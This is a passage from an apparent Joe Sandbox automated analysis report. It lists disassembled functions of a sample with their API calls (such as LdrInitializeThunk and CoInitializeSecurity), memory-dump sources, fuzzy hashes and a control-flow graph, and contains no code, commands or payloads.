                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0
                                                                                          • Opcode ID: 1048c3025e0b4ddacca64e2b79def29365ef645ea27283a32564340b2f92fe60
                                                                                          • Instruction ID: 8b9e036879fc29620f9d8ce957160a136b0565f8986e72e1014e0afb650f187e
                                                                                          • Opcode Fuzzy Hash: 1048c3025e0b4ddacca64e2b79def29365ef645ea27283a32564340b2f92fe60
                                                                                          • Instruction Fuzzy Hash: 6011AB37E042108FC3108F28DCA1797BB5AEBC6310F2A013DDC804B680CA385806CBC1
                                                                                          Function 004B0F10 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL(004B46AD,005C003F,00000006,?,?,00000018,?,?,?), ref: 004B0F3E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                          • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                          • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                          • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                          Function 004B4C40 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: @
                                                                                          • API String ID: 2994545307-2766056989
                                                                                          • Opcode ID: e02af52bb8697f7aa81e46a96e7e502b6df8d18a0aaff66103c7ea11f7d16193
                                                                                          • Instruction ID: 18cb775952d2a633041d26e840568d4881b7dd09ace3d0c691814e777f7e031b
                                                                                          • Opcode Fuzzy Hash: e02af52bb8697f7aa81e46a96e7e502b6df8d18a0aaff66103c7ea11f7d16193
                                                                                          • Instruction Fuzzy Hash: 763124715083009BD318DF68D8D16ABBBF5FBD5314F04893DEA8587391D3389848CB66
                                                                                          Function 0049AB20 Relevance: .5, Instructions: 477COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 81b789075639b6dbc614758fff6b8f7a7938311485cec5de8d483d0da30744bc
                                                                                          • Instruction ID: 430dd5d39ef2f46c2491ef4dee67eb11ab7f9f307eccd6e70676c1a5a08251e4
                                                                                          • Opcode Fuzzy Hash: 81b789075639b6dbc614758fff6b8f7a7938311485cec5de8d483d0da30744bc
                                                                                          • Instruction Fuzzy Hash: C9D17A726483004BDF148E2888816AB7BE2EF95314F19863EE9954B395E23CDD1A93C7
                                                                                          Function 004AB7B0 Relevance: .3, Instructions: 288COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 96acf46fdbe788074ee13e797b233586d55e36c59aa1de51ed408d8422ddb428
                                                                                          • Instruction ID: b6d361422a80e4ae0f4affe6100ced7fa3ed35a44cc95cc3c324d4b7e7c456ce
                                                                                          • Opcode Fuzzy Hash: 96acf46fdbe788074ee13e797b233586d55e36c59aa1de51ed408d8422ddb428
                                                                                          • Instruction Fuzzy Hash: 7EB1287260C3808AD3149A3C895436BBBD2EBEA314F198B2EE4D6833D7D77C8545835B
                                                                                          Function 0049A510 Relevance: .2, Instructions: 154COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447205446.00000000006E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447219717.00000000006EF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447233560.0000000000729000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447275971.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.0000000000759000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447289703.000000000075F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447318583.000000000076E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447334544.000000000076F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_470000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0d455d9af3f456d1efb09a4e9978f32492d72e6cc7b63d51f0a803d10c0f0cd6
                                                                                          • Instruction ID: d28de85c109b042a2d5596ea30ba57306967e1c27873f7f09b687d9e1dbff8d9
                                                                                          • Opcode Fuzzy Hash: 0d455d9af3f456d1efb09a4e9978f32492d72e6cc7b63d51f0a803d10c0f0cd6
                                                                                          • Instruction Fuzzy Hash: 68412A72748301DFD7188F24DC92BABB7E5EB89304F08483DE581932A1D678E855C756
                                                                                          Function 00480CA0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 308COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 600 480ca0-480cbb CoInitializeSecurity 601 480ddd 600->601 602 480cc2-480ccd call 4abb70 600->602 604 480de3 601->604 605 480cd2-480ce6 602->605 606 480de6-480def 604->606 607 480cf0-480d0e 605->607 608 480e0b-480e13 606->608 609 480df1-480df4 606->609 607->607 610 480d10-480d5f 607->610 612 480e2d 608->612 613 480e15-480e19 608->613 611 480e00-480e09 609->611 614 480d60-480d8e 610->614 611->608 611->611 617 480e30-480ee6 612->617 615 480e20-480e29 613->615 614->614 616 480d90-480d9c 614->616 615->615 618 480e2b 615->618 619 480dbb-480dc3 616->619 620 480d9e-480da1 616->620 621 480ef0-480f23 617->621 618->617 619->604 623 480dc5-480dc9 619->623 622 480db0-480db9 620->622 621->621 624 480f25-480f4b 621->624 622->619 622->622 625 480dd0-480dd9 623->625 626 480f50-480f89 624->626 625->625 627 480ddb 625->627 626->626 628 480f8b-480fa9 call 47fa80 626->628 627->606 630 480fae-480fb4 628->630 631 480fbb-480fc8 630->631 632 48103d-481046 call 473dc0 630->632 633 480fcf-480ff7 630->633 631->631 631->633 637 480ff9-480ffc 633->637 638 480ffe 633->638 637->638 639 480fff-481007 637->639 638->639 640 481009-48100c 639->640 641 48100e 639->641 640->641 642 48100f-481036 call 47c880 call 4ac620 call 4ae210 640->642 641->642 642->631 642->632 642->633
                                                                                          APIs
                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00480CB2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1441383982.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                          • Associated: 00000001.00000002.1441365292.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441455890.00000000004CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1441478506.00000000004D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446774333.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446822827.0000000000637000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000646000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446848944.0000000000650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446913238.000000000065C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446927373.000000000065D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446947058.0000000000670000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446962361.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1446988453.000000000068C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447005302.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447024687.00000000006AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447048661.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447067078.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447087531.00000000006B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447103601.00000000006BD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447118718.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447132811.00000000006C2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447146553.00000000006C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447163029.00000000006DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447176509.00000000006DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000001.00000002.1447189604.00000000006DD000.00000080.00000001.01000000.00000003.sdmpDownload File
